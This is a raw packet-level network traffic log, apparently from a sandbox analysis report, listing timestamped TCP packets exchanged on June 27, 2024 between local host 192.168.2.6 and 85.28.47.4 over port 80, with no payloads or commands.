                                                                Jun 27, 2024 05:58:11.877656937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877657890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877669096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877681017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877682924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877692938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877701044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877705097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877716064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877722025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877727985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877737045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877738953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.877762079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.877784014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878487110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878499031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878509045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878519058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878530025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878536940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878540993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878551006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878561974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878562927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878573895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878582001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878587961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878597975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878597975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878603935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878614902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878623962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878627062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878638029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878648996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878648996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878667116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.878669977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878684998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.878706932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.960900068 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.960939884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.960952044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961004972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961013079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961018085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961030006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961041927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961051941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961055040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961061954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961078882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961102009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961241007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961251974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961261988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961282969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961303949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961391926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961402893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961414099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961425066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961433887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961436987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961451054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961456060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961482048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961492062 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961699009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961711884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961721897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961744070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961745977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961766005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961769104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961777925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961790085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961790085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961802006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961806059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961813927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961827040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.961827040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961853981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.961879015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962177992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962188959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962199926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962222099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962243080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962249994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962261915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962272882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962285042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962295055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962296009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962307930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962316990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962332964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962385893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962847948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962861061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962871075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962882042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962893009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962899923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962903023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962914944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962923050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962925911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962939978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962944984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962951899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962955952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962963104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962975025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962982893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.962985992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.962996960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963007927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963018894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963021040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963031054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963033915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963046074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963058949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963084936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963612080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963627100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963637114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963665009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963680029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963721991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963735104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963746071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963763952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963766098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963777065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963788986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963789940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963799953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963813066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963814974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963824034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963836908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.963840961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963862896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.963876963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964256048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964267969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964279890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964302063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964322090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964421988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964432955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964443922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964466095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964467049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964487076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964493990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964498997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964509964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964510918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964523077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964533091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964534044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964545965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964554071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964556932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964570999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964575052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964585066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964596033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964598894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.964620113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.964637041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965396881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965409040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965420008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965432882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965440035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965445042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965456009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965466976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965468884 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965477943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965482950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965488911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965498924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965501070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965512991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965523958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965523958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965537071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965547085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965548038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965568066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965570927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.965581894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.965606928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966484070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966495991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966507912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966526985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966545105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966571093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966583014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966593027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966603994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966605902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966628075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966650963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966738939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966751099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966761112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966773987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966792107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966882944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966897011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966907978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966918945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.966919899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966944933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.966968060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.047903061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.047921896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.047941923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.047952890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.047971010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.047982931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.047993898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048084974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048130035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048139095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048177958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048177958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048177958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048190117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048202038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048213005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048223972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048244953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048275948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048439980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048453093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048464060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048476934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048495054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048680067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048676968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048738003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048744917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048784018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048806906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048844099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048857927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048877001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048887014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048912048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048932076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.048965931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.048968077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049016953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049036980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049067020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049082994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049099922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049112082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049134970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049145937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049169064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049180984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049204111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049215078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049240112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049261093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049274921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049297094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049309015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049319029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049344063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049356937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049376965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049390078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049411058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049420118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049446106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049463034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049495935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049566984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049599886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049633026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049645901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049669027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049673080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049701929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049705982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049712896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049741030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049767971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049801111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049879074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049911022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049927950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049947023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.049951077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.049995899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050041914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050075054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050088882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050107002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050117970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050143003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050158024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050179958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050189018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050215006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050229073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050247908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050259113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050282955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050293922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050318003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050324917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050354004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050368071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050388098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050394058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050429106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050440073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050462961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050476074 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050499916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050506115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050594091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.050846100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050878048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050910950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.050915003 CEST4971180192.168.2.685.28.47.4
